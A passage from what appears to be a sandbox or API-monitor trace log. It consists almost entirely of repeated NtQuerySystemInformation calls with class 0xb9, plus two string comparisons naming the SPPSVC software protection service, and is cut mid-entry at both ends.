(SystemInformationClass=0xb9, SystemInformation=0xc751dfd5d0, Length=0x50, ResultLength=0x0) [0206.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd5d0, Length=0x50, ResultLength=0x0) [0206.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4c0, Length=0x50, ResultLength=0x0) [0206.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4c0, Length=0x50, ResultLength=0x0) [0206.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4c0, Length=0x50, ResultLength=0x0) [0206.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4c0, Length=0x50, ResultLength=0x0) [0206.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3f0, Length=0x38, ResultLength=0x0) [0206.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd220, Length=0x28, ResultLength=0x0) [0206.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd220, Length=0x28, ResultLength=0x0) [0206.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd220, Length=0x28, ResultLength=0x0) [0206.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd290, Length=0x28, ResultLength=0x0) [0206.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3f0, Length=0x38, ResultLength=0x0) [0206.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd310, Length=0x28, ResultLength=0x0) [0206.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd310, Length=0x28, ResultLength=0x0) [0206.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3f0, Length=0x38, ResultLength=0x0) [0206.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd270, Length=0x20, ResultLength=0x0) [0206.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1f0, Length=0x20, ResultLength=0x0) [0206.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1f0, Length=0x20, ResultLength=0x0) [0206.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1f0, Length=0x20, ResultLength=0x0) [0206.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3f0, Length=0x38, ResultLength=0x0) [0206.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd270, Length=0x20, ResultLength=0x0) [0206.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd200, Length=0x20, ResultLength=0x0) [0206.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd200, Length=0x20, ResultLength=0x0) [0206.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd5d0, Length=0x50, ResultLength=0x0) [0206.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd5d0, Length=0x50, ResultLength=0x0) [0206.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd5d0, Length=0x50, ResultLength=0x0) [0206.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4c0, Length=0x50, ResultLength=0x0) [0206.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4c0, Length=0x50, ResultLength=0x0) [0206.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4c0, Length=0x50, ResultLength=0x0) [0206.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4c0, Length=0x50, ResultLength=0x0) [0206.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3f0, Length=0x38, ResultLength=0x0) [0206.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd220, Length=0x28, ResultLength=0x0) [0206.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd220, Length=0x28, ResultLength=0x0) [0206.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd220, Length=0x28, ResultLength=0x0) [0206.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd290, Length=0x28, ResultLength=0x0) [0206.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3f0, Length=0x38, ResultLength=0x0) [0206.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd310, Length=0x28, ResultLength=0x0) [0206.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd310, Length=0x28, ResultLength=0x0) [0206.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3f0, Length=0x38, ResultLength=0x0) [0206.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd270, Length=0x20, ResultLength=0x0) [0206.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1f0, Length=0x20, ResultLength=0x0) [0206.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1f0, Length=0x20, ResultLength=0x0) [0206.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1f0, Length=0x20, ResultLength=0x0) [0206.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3f0, Length=0x38, ResultLength=0x0) [0206.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd270, Length=0x20, ResultLength=0x0) [0206.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd200, Length=0x20, ResultLength=0x0) [0206.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd200, Length=0x20, ResultLength=0x0) [0206.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd680, Length=0x50, ResultLength=0x0) [0206.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd600, Length=0x28, ResultLength=0x0) [0206.203] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0206.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd680, Length=0x50, ResultLength=0x0) [0206.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd680, Length=0x50, ResultLength=0x0) [0206.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd680, Length=0x50, ResultLength=0x0) [0206.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd5b0, Length=0x38, ResultLength=0x0) [0206.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e0, Length=0x28, ResultLength=0x0) [0206.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e0, Length=0x28, ResultLength=0x0) [0206.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e0, Length=0x28, ResultLength=0x0) [0206.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd450, Length=0x28, ResultLength=0x0) [0206.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd5b0, Length=0x38, ResultLength=0x0) [0206.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4d0, Length=0x28, ResultLength=0x0) [0206.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4d0, Length=0x28, ResultLength=0x0) [0206.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd5b0, Length=0x38, ResultLength=0x0) [0206.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd430, Length=0x20, ResultLength=0x0) [0206.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3b0, Length=0x20, ResultLength=0x0) [0206.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3b0, Length=0x20, ResultLength=0x0) [0206.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3b0, Length=0x20, ResultLength=0x0) [0206.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd5b0, Length=0x38, ResultLength=0x0) [0206.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd430, Length=0x20, ResultLength=0x0) [0206.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3c0, Length=0x20, ResultLength=0x0) [0206.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3c0, Length=0x20, ResultLength=0x0) [0206.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd680, Length=0x50, ResultLength=0x0) [0206.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd600, Length=0x28, ResultLength=0x0) [0206.213] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0206.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd680, Length=0x50, ResultLength=0x0) [0206.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd680, Length=0x50, ResultLength=0x0) [0206.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd680, Length=0x50, ResultLength=0x0) [0206.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd5b0, Length=0x38, ResultLength=0x0) [0206.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e0, Length=0x28, ResultLength=0x0) [0206.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e0, Length=0x28, ResultLength=0x0) [0206.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e0, Length=0x28, ResultLength=0x0) [0206.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd450, Length=0x28, ResultLength=0x0) [0206.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd5b0, Length=0x38, ResultLength=0x0) [0206.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4d0, Length=0x28, ResultLength=0x0) [0206.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4d0, Length=0x28, ResultLength=0x0) [0206.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd5b0, Length=0x38, ResultLength=0x0) [0206.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd430, Length=0x20, ResultLength=0x0) [0206.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3b0, Length=0x20, ResultLength=0x0) [0206.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3b0, Length=0x20, ResultLength=0x0) [0206.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3b0, Length=0x20, ResultLength=0x0) [0206.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd5b0, Length=0x38, ResultLength=0x0) [0206.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd430, Length=0x20, ResultLength=0x0) [0206.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3c0, Length=0x20, ResultLength=0x0) [0206.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, 